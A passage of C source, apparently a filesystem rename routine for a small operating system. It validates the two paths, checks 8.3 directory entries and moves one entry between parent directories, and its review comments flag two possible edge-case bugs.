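	/* An empty path has no separator to strip and nothing to parse. */
	if (len1 == 0 || len2 == 0)
		return EINVALIDNAME;
	strcpy(oldpath, a_oldpath);
	strcpy(newpath, a_newpath);

	/* Drop one trailing separator so "dir/" and "dir" parse alike. */
	if (oldpath[len1-1] == '/' || oldpath[len1-1] == '\\')
		oldpath[len1-1] = '\0';
	if (newpath[len2-1] == '/' || newpath[len2-1] == '\\')
		newpath[len2-1] = '\0';

	parse_path(oldpath, &drive1, dir_path1, name_comp1);
	parse_path(newpath, &drive2, dir_path2, name_comp2);

	/* Only the directory entry moves, so both ends must be on one drive. */
	if (drive1 != drive2)
		return EDEVICE_DIFFERENT;

	nhandle = open_path(drive2, dir_path2);
	if (nhandle < 0)
		return nhandle;
	if (name_comp2[0] != '\0') {
		/* conv_name2 is 11 bytes, the same size as dent.name, so this is
		 * presumably the on-disk 8.3 form -- confirm in convert_name(). */
		if (convert_name(name_comp2, conv_name2) < 0) {
			close_dir(nhandle);
			return EINVALIDNAME; // Error
		}
		exist2 = find_entry(nhandle, conv_name2, &dent2);
	}
	/* NOTE(review): with an empty name_comp2, conv_name2 is never filled
	 * in but is still copied into the new entry further down -- TODO
	 * confirm what a destination without a final component should do. */

	ohandle = open_path(drive1, dir_path1);
	if (ohandle < 0) {
		close_dir(nhandle);
		return ohandle;
	}
	if (name_comp1[0] != '\0') {
		if (convert_name(name_comp1, conv_name1) < 0) {
			close_dir(nhandle);
			close_dir(ohandle);
			return EINVALIDNAME; // Error
		}
		exist1 = find_entry(ohandle, conv_name1, &dent1);
	}

	// Check whether new path exists and is removable
	if ((exist2 == 1) &&
	    ((dent2.attrib & FTYPE_READONLY) ||
	     ((dent2.attrib & FTYPE_DIR) && (empty_dir(nhandle, &dent2) != 1)))) {
		close_dir(nhandle);
		close_dir(ohandle);
		return ETARGET_EXISTS;
	}

	// Check if source exists and is movable
	if (exist1 != 1) {
		close_dir(nhandle);
		close_dir(ohandle);
		return EPATH_NOT_EXISTS;
	}
	if ((dent1.attrib & FTYPE_READONLY) != 0) {
		close_dir(nhandle);
		close_dir(ohandle);
		return EREADONLY;
	}

	// Check whether oldpath is not a subpath of newpath
	/* Walk the open-directory chain upwards from the destination parent.
	 * NOTE(review): the walk stops at ohandle, the *parent* of the source,
	 * not at the source directory itself, so moving a directory into a
	 * sibling subdirectory is refused as well -- confirm that is intended. */
	if ((dent1.attrib & FTYPE_DIR) && (ohandle != nhandle)) {
		t = nhandle;
		dirf = &dir_file_list[t];
		while (dirf->parent_index >= 0 && dirf->parent_index != ohandle) {
			t = dirf->parent_index;
			dirf = &dir_file_list[t];
		}
		if (dirf->parent_index == ohandle) {
			close_dir(nhandle);
			close_dir(ohandle);
			return EOLDPATH_PARENT_OF_NEWPATH;
		}
	}

	// Check if newpath already exists whether it is compatible or not
	if ((exist2 == 1) &&
	    (((dent1.attrib & FTYPE_DIR) != 0 && (dent2.attrib & FTYPE_DIR) == 0) ||
	     ((dent1.attrib & FTYPE_DIR) == 0 && (dent2.attrib & FTYPE_DIR) != 0))) {
		close_dir(nhandle);
		close_dir(ohandle);
		return ESRC_DEST_NOT_SAME_TYPE;
	}

	// Remove destination entry if exists
	if (exist2 == 1) {
		if (dent2.attrib & FTYPE_DIR)
			syscall_rmdir(newpath);
		else
			syscall_unlink(newpath);
	}

	// Add the source dir entry after changing the name
	// to destination directory
	dent2 = dent1;
	for (i = 0; i < 11; i++) // Both name and extension
		dent2.name[i] = conv_name2[i];
	t = add_dir_entry(nhandle, &dent2);
	/* Remove the old entry only once the new one exists, so a failed add
	 * leaves the source untouched rather than lost. */
	if (t == 1) {
		delete_dir_entry(ohandle, dent1.name);
	}

	// Close the handles of parent directories
	close_dir(ohandle);
	close_dir(nhandle);

	if (t == 1)
		return 0;
	else
		return t;
}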